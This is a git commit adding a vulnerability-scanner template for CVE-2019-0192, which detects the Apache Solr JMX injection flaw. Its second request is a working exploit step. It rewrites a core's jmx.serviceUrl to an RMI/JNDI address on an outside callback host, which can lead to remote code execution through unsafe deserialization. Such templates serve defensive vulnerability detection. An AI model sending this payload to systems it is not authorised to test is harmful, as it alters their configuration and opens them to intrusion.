Create CVE-2019-0192.yaml

/claim #10891
2024-11-01 23:55:53 +07:00 · 2024-11-01 23:55:53 +07:00 · f105c4b1a0
parent 94ac0e99b3
commit f105c4b1a0
1 changed files with 49 additions and 0 deletions
--- a/http/cves/2019/CVE-2019-0192.yaml
+++ b/http/cves/2019/CVE-2019-0192.yaml
@ -0,0 +1,49 @@
+id: CVE-2019-0192
+
+info:
+  name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr 
+  author: hnd3884
+  severity: Critical
+  description: |
+    This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI 
+  reference:
+    - https://github.com/Imanfeng/Apache-Solr-RCE
+
+http:
+  - raw:
+      - |
+        GET /solr/admin/cores?wt=json HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101
+
+    extractors:
+      - type: json
+        name: core_name
+        json:
+          - '.status | .[].name'
+        internal: true
+
+  - raw:
+      - |
+        POST /solr/{{core_name}}/config HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Content-Length: 123
+
+        {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+      - type: word
+        part: body
+        words: 
+          - "javax.management.remote.rmi"
+    extractors:
+    - type: regex
+      part: body
+      regex:
+        - "rmi://.+?:1097/obj"